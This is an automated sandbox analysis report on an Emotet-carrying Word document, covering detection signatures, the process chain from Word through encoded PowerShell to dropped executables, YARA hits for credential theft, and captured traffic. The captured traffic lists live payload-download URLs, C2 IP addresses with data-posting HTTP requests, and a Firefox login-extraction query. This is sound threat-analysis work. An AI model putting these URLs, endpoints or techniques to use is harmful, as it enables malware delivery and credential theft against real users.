Analysis Report SecuriteInfo.com.Exploit.Siggen2.13449.28674.8313

Overview

General Information

Sample Name: SecuriteInfo.com.Exploit.Siggen2.13449.28674.8313 (renamed file extension from 8313 to doc)
Analysis ID: 255748
MD5: a218719fd104a4c006280fed89268170
SHA1: 4a14ff4ab8445b69e5ad1960236a0c4c4b583d6e
SHA256: dc875f711c036d142c516a749754c9752e410f28c3a2223de920488093754e0b

Most interesting Screenshot:

Detection

Emotet, MailPassView
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Emotet Banking Trojan found
Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected Emotet Downloader
Yara detected MailPassView
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA with hexadecimal encoded strings
Document contains an embedded VBA with many randomly named variables
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
PowerShell case anomaly found
Powershell drops PE file
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Tries to steal Mail credentials (via file registry)
Very long command line found
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
AV process strings found (often used to terminate AV products)
Allocates a big amount of memory (probably used for heap spraying)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Process Creation
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 6096 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • svchost.exe (PID: 5508 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • powershell.exe (PID: 5712 cmdline: powersheLL -e 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 MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 5084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • 285.exe (PID: 6044 cmdline: C:\Users\user\285.exe MD5: 769A6326DC875AB999B689266B13D788)
    • hnetcfg.exe (PID: 5548 cmdline: C:\Windows\SysWOW64\polstore\hnetcfg.exe MD5: 769A6326DC875AB999B689266B13D788)
      • hnetcfg.exe (PID: 1272 cmdline: 'C:\Windows\SysWOW64\polstore\hnetcfg.exe' 'C:\Users\user\AppData\Local\Temp\43E7.tmp' MD5: 769A6326DC875AB999B689266B13D788)
      • hnetcfg.exe (PID: 6108 cmdline: 'C:\Windows\SysWOW64\polstore\hnetcfg.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4AED.tmp' MD5: 769A6326DC875AB999B689266B13D788)
      • hnetcfg.exe (PID: 2296 cmdline: 'C:\Windows\SysWOW64\polstore\hnetcfg.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4F34.tmp' MD5: 769A6326DC875AB999B689266B13D788)
      • hnetcfgoe.exe (PID: 1908 cmdline: 'C:\Windows\SysWOW64\polstore\hnetcfgoe.exe' 'C:\Users\user\AppData\Local\Temp\43E7.tmp' MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
  • svchost.exe (PID: 4888 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5364 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 5524 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 5988 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 472 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author
C:\Users\user\Documents\20200802\PowerShell_transcript.610930.dI+g4eiZ.20200802005712.txt | PowerShell_Case_Anomaly | Detects obfuscated PowerShell hacktools | Florian Roth
  • 0x23:$s1: PowerShell
  • 0xfd:$s1: powersheLL
  • 0xf7d:$s1: PowerShell
  • 0x23:$sr1: PowerShell
  • 0xf7d:$sr1: PowerShell
  • 0x23:$sn3: PowerShell
  • 0xf7d:$sn3: PowerShell
  • 0xff:$a1: wersheLL -e
C:\Users\user\Documents\20200802\PowerShell_transcript.610930.dI+g4eiZ.20200802005712.txt | JoeSecurity_EmotetDownloader | Yara detected Emotet Downloader | Joe Security

Memory Dumps

Source | Rule | Description | Author
0000000D.00000001.372041274.0000000000400000.00000040.00020000.sdmp | APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Detects BabyShark KimJongRAT | Florian Roth
  • 0x147b0:$a1: logins.json
  • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  • 0x14f34:$s4: \mozsqlite3.dll
  • 0x137a4:$s5: SMTP Password
0000000D.00000001.372041274.0000000000400000.00000040.00020000.sdmp | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
00000006.00000003.362342642.0000000002B07000.00000004.00000001.sdmp | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
0000000C.00000002.374344399.0000000000400000.00000040.00000001.sdmp | JoeSecurity_WebBrowserPassView | Yara detected WebBrowserPassView password recovery tool | Joe Security
00000006.00000003.376128952.0000000003E80000.00000040.00000001.sdmp | APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Detects BabyShark KimJongRAT | Florian Roth
  • 0x147b0:$a1: logins.json
  • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  • 0x14f34:$s4: \mozsqlite3.dll
  • 0x137a4:$s5: SMTP Password
(21 entries in total; the remainder are not shown here)

Unpacked PEs

Source | Rule | Description | Author
6.2.hnetcfg.exe.3b00000.7.unpack | JoeSecurity_Emotet | Yara detected Emotet | Joe Security
13.1.hnetcfg.exe.400000.0.raw.unpack | APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Detects BabyShark KimJongRAT | Florian Roth
  • 0x147b0:$a1: logins.json
  • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  • 0x14f34:$s4: \mozsqlite3.dll
  • 0x137a4:$s5: SMTP Password
13.1.hnetcfg.exe.400000.0.raw.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
13.2.hnetcfg.exe.400000.0.raw.unpack | APT_NK_BabyShark_KimJoingRAT_Apr19_1 | Detects BabyShark KimJongRAT | Florian Roth
  • 0x147b0:$a1: logins.json
  • 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login
  • 0x14f34:$s4: \mozsqlite3.dll
  • 0x137a4:$s5: SMTP Password
13.2.hnetcfg.exe.400000.0.raw.unpack | JoeSecurity_MailPassView | Yara detected MailPassView | Joe Security
(19 entries in total; the remainder are not shown here)

Sigma Overview

System Summary:

Sigma detected: Suspicious Process Creation
Source: Process started | Author: Florian Roth, Daniil Yugoslavskiy, oscd.community (update) | Data: Command: 'C:\Windows\SysWOW64\polstore\hnetcfg.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4AED.tmp', CommandLine: 'C:\Windows\SysWOW64\polstore\hnetcfg.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4AED.tmp', CommandLine|base64offset|contains: (f, Image: C:\Windows\SysWOW64\polstore\hnetcfg.exe, NewProcessName: C:\Windows\SysWOW64\polstore\hnetcfg.exe, OriginalFileName: C:\Windows\SysWOW64\polstore\hnetcfg.exe, ParentCommandLine: C:\Windows\SysWOW64\polstore\hnetcfg.exe, ParentImage: C:\Windows\SysWOW64\polstore\hnetcfg.exe, ParentProcessId: 5548, ProcessCommandLine: 'C:\Windows\SysWOW64\polstore\hnetcfg.exe' /scomma 'C:\Users\user\AppData\Local\Temp\4AED.tmp', ProcessId: 6108

Signature Overview

Source: C:\Users\user\285.exe | Code function: 5_2_00401078 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,
Source: C:\Users\user\285.exe | Code function: 5_2_00444717 lstrlenA,FindFirstFileA,FindClose,
Source: C:\Users\user\285.exe | Code function: 5_2_004047C0 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Users\user\285.exe | Code function: 5_2_004028E0 FindFirstFileA,FindClose,
Source: C:\Users\user\285.exe | Code function: 5_2_004390BA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
Source: C:\Windows\SysWOW64\polstore\hnetcfg.exe | Code function: 6_2_00401078 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\polstore\hnetcfg.exe | Code function: 6_2_00444717 lstrlenA,FindFirstFileA,FindClose,
Source: C:\Windows\SysWOW64\polstore\hnetcfg.exe | Code function: 6_2_004047C0 FindFirstFileA,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\polstore\hnetcfg.exe | Code function: 6_2_004028E0 FindFirstFileA,FindClose,
Source: C:\Windows\SysWOW64\polstore\hnetcfg.exe | Code function: 6_2_004390BA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,
Source: C:\Windows\SysWOW64\polstore\hnetcfg.exe | Code function: 12_2_0040A1A7 FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\polstore\hnetcfg.exe | Code function: 12_1_0040A1A7 FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\polstore\hnetcfg.exe | Code function: 13_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,
Source: C:\Windows\SysWOW64\polstore\hnetcfg.exe | Code function: 13_1_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,
Source: C:\Windows\SysWOW64\polstore\hnetcfg.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\
Source: C:\Windows\SysWOW64\polstore\hnetcfg.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
Source: C:\Windows\SysWOW64\polstore\hnetcfg.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\
Source: C:\Windows\SysWOW64\polstore\hnetcfg.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\
Source: C:\Windows\SysWOW64\polstore\hnetcfg.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
Source: C:\Windows\SysWOW64\polstore\hnetcfg.exe | File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\
Source: winword.exe | Memory has grown: Private usage: 0MB later: 63MB
Source: global traffic | DNS query: name: rectificadoscarrion.com
Source: global traffic | TCP traffic: 192.168.2.3:49705 -> 185.94.252.13:443
Source: global traffic | TCP traffic: 192.168.2.3:49702 -> 217.76.132.179:80

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2404314 ET CNC Feodo Tracker Reported CnC Server TCP group 8 192.168.2.3:49705 -> 185.94.252.13:443
Source: global traffic | HTTP traffic detected: GET /wp-includes/EiQ/ HTTP/1.1 | Host: rectificadoscarrion.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: POST /OU3ZX52m5/nmqAIrkIJI1bik/zs7HrPUm7ELzb/NnwOyp/ HTTP/1.1 | Referer: http://185.94.252.13/OU3ZX52m5/nmqAIrkIJI1bik/zs7HrPUm7ELzb/NnwOyp/ | Content-Type: multipart/form-data; boundary=---------------------------316018655839823 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 185.94.252.13:443 | Content-Length: 4580 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /V1bfVNXmGf/ HTTP/1.1 | Referer: http://185.94.252.13/V1bfVNXmGf/ | Content-Type: multipart/form-data; boundary=---------------------------892891687659634 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 185.94.252.13:443 | Content-Length: 4580 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /XxXEdON5aVYXFRQitMj/oWmuuNtyx0q6einR/L2HdFwm6Bbbyl8/HG6zDRBX6Fqg1c/ HTTP/1.1 | Referer: http://185.94.252.13/XxXEdON5aVYXFRQitMj/oWmuuNtyx0q6einR/L2HdFwm6Bbbyl8/HG6zDRBX6Fqg1c/ | Content-Type: multipart/form-data; boundary=---------------------------131968411906821 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 185.94.252.13:443 | Content-Length: 4580 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /l9mxCPCRzvrdJqd7gDg/8NeBfb/UP3O0TnX/bFLb7raYZ3UvCr/PYNusX3ERpHpdqNnga3/DDoS0Ahi/ HTTP/1.1 | Referer: http://185.94.252.13/l9mxCPCRzvrdJqd7gDg/8NeBfb/UP3O0TnX/bFLb7raYZ3UvCr/PYNusX3ERpHpdqNnga3/DDoS0Ahi/ | Content-Type: multipart/form-data; boundary=---------------------------949519084990397 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 185.94.252.13:443 | Content-Length: 4596 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /pxUyBndrkFQg9MbC/BNGA/7r3Jr4QC8l8byshfZ/GE38Mqblnsqox/FGlnTj12jUpGlPKrKS/ HTTP/1.1 | Referer: http://185.94.252.13/pxUyBndrkFQg9MbC/BNGA/7r3Jr4QC8l8byshfZ/GE38Mqblnsqox/FGlnTj12jUpGlPKrKS/ | Content-Type: multipart/form-data; boundary=---------------------------814281218010596 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 185.94.252.13:443 | Content-Length: 4596 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /nwkpxZwyjrCeZbfcf/fAnIZcRwnf99IuspZD/VFvg1jezY7LUpm/EiahSxVLNzl8Cwm9/fvlm/j3oA7SgmOJ3RXLHzKx/ HTTP/1.1 | Referer: http://185.94.252.13/nwkpxZwyjrCeZbfcf/fAnIZcRwnf99IuspZD/VFvg1jezY7LUpm/EiahSxVLNzl8Cwm9/fvlm/j3oA7SgmOJ3RXLHzKx/ | Content-Type: multipart/form-data; boundary=---------------------------234328357235502 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 185.94.252.13:443 | Content-Length: 4596 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /HUU9YW2A/ HTTP/1.1 | Referer: http://88.217.172.65/HUU9YW2A/ | Content-Type: multipart/form-data; boundary=---------------------------010920034514373 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 88.217.172.65:443 | Content-Length: 4356 | Connection: Keep-Alive | Cache-Control: no-cache
Source: unknown | TCP traffic detected without corresponding DNS query: 73.116.193.136
Source: unknown | TCP traffic detected without corresponding DNS query: 185.94.252.13
Source: hnetcfg.exe, 0000000C.00000002.374983827.0000000000A89000.00000004.00000040.sdmp | String found in binary or memory: ://192.168.2.1/temp/Office16.x86.en-US.ISOhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfres://C:\Windows\system32\mmcndmgr.dll/views.htmfile:///C:/jbxinitvm.au3file:///C:/Users/user/Desktop/SecuriteInfo.com.Exploit.Siggen2.13449.28674.dochttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: hnetcfg.exe, 0000000C.00000002.374983827.0000000000A89000.00000004.00000040.sdmp | String found in binary or memory: ://192.168.2.1/temp/Office16.x86.en-US.ISOhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=1033&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfres://C:\Windows\system32\mmcndmgr.dll/views.htmfile:///C:/jbxinitvm.au3file:///C:/Users/user/Desktop/SecuriteInfo.com.Exploit.Siggen2.13449.28674.dochttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: hnetcfg.exe, 00000006.00000003.376675052.000000000388D000.00000004.00000001.sdmp, hnetcfg.exe, 0000000C.00000002.374344399.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: hnetcfg.exe, 00000006.00000003.376675052.000000000388D000.00000004.00000001.sdmp, hnetcfg.exe, 0000000C.00000002.374344399.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: @dllhost.exetaskhost.exetaskhostex.exebhvContainersContainerIdNameHistoryContainer_%I64dAccessCountCreationTimeExpiryTimeAccessedTimeModifiedTimeUrlEntryIDvisited:Microsoft\Windows\WebCache\WebCacheV01.datMicrosoft\Windows\WebCache\WebCacheV24.dat0123456789ABCDEFURL index.datSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: hnetcfg.exe | String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: unknown | DNS traffic detected: queries for: rectificadoscarrion.com
Source: unknown | HTTP traffic detected: POST /OU3ZX52m5/nmqAIrkIJI1bik/zs7HrPUm7ELzb/NnwOyp/ HTTP/1.1 | Referer: http://185.94.252.13/OU3ZX52m5/nmqAIrkIJI1bik/zs7HrPUm7ELzb/NnwOyp/ | Content-Type: multipart/form-data; boundary=---------------------------316018655839823 | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 185.94.252.13:443 | Content-Length: 4580 | Connection: Keep-Alive | Cache-Control: no-cache
Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13/l9mxCPCRzvrdJqd7gDg/8NeBfb/UP3O0TnX/bFLb7raYZ3UvCr/PYNusX3ERpHpdqNnga3/DDoS0Ahi
Source: hnetcfg.exe, 00000006.00000002.530211089.0000000002A50000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13/nwkpxZwyjrCeZbfcf/fAnIZcRwnf99IuspZD/VFvg1jezY7LUpm/EiahSxVLNzl8Cwm9/fvlm/j3oA7
Source: hnetcfg.exe, 00000006.00000003.362310502.0000000002AA3000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13:443/OU3ZX52m5/nmqAIrkIJI1bik/zs7HrPUm7ELzb/NnwOyp/
Source: hnetcfg.exe, 00000006.00000003.362310502.0000000002AA3000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13:443/OU3ZX52m5/nmqAIrkIJI1bik/zs7HrPUm7ELzb/NnwOyp/v
Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13:443/V1bfVNXmGf/
Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13:443/V1bfVNXmGf/6
Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13:443/XxXEdON5aVYXFRQitMj/oWmuuNtyx0q6einR/L2HdFwm6Bbbyl8/HG6zDRBX6Fqg1c/
Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmp, hnetcfg.exe, 00000006.00000002.530145861.0000000002A34000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13:443/nwkpxZwyjrCeZbfcf/fAnIZcRwnf99IuspZD/VFvg1jezY7LUpm/EiahSxVLNzl8Cwm9/fvlm/j
Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13:443/pxUyBndrkFQg9MbC/BNGA/7r3Jr4QC8l8byshfZ/GE38Mqblnsqox/FGlnTj12jUpGlPKrKS/
Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.252.13:443/pxUyBndrkFQg9MbC/BNGA/7r3Jr4QC8l8byshfZ/GE38Mqblnsqox/FGlnTj12jUpGlPKrKS/O
Source: hnetcfg.exe, 00000006.00000002.530324674.0000000002AE0000.00000004.00000001.sdmp | String found in binary or memory: http://185.94.25w
Source: hnetcfg.exe, 00000006.00000003.362310502.0000000002AA3000.00000004.00000001.sdmp | String found in binary or memory: http://73.116.193.136/Fovb6wRbsEl0OBz2sIZ/NzqDzD4SZx/nQZlEmTUbvZmXJyA/DhlB12Ns70NcwOtMshF/
Source: hnetcfg.exe, 00000006.00000003.361221585.0000000002AA1000.00000004.00000001.sdmp | String found in binary or memory: http://73.116.193.136/Fovb6wRbsEl0OBz2sIZ/NzqDzD4SZx/nQZlEmTUbvZmXJyA/DhlB12Ns70NcwOtMshF/G
Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmp | String found in binary or memory: http://88.217.172.65/HUU9YW2A/
Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmp, hnetcfg.exe, 00000006.00000003.416090071.0000000002AF1000.00000004.00000001.sdmp | String found in binary or memory: http://88.217.172.65:443/HUU9YW2A/
Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmp | String found in binary or memory: http://88.217.172.65:443/HUU9YW2A/r
Source: hnetcfg.exe, 00000006.00000002.530284529.0000000002A95000.00000004.00000001.sdmp | String found in binary or memory: http://88.217.172.65:443/HUU9YW2A/ys
Source: svchost.exe, 00000001.00000002.530257687.0000023192012000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: hnetcfg.exe, 00000006.00000003.362328646.0000000002ABC000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsup43/OU3ZX52m5/nmqAIrkIJI1bik/zs7HrPUm7ELzb/NnwOyp/
Source: svchost.exe, 00000001.00000002.530257687.0000023192012000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000001.00000002.530257687.0000023192012000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: PowerShell_transcript.610930.dI+g4eiZ.20200802005712.txt.2.dr | String found in binary or memory: http://qatifsport.net/t/NbQq254/
Source: PowerShell_transcript.610930.dI+g4eiZ.20200802005712.txt.2.dr | String found in binary or memory: http://rectificadoscarrion.com/wp-includes/EiQ/
                Source: PowerShell_transcript.610930.dI+g4eiZ.20200802005712.txt.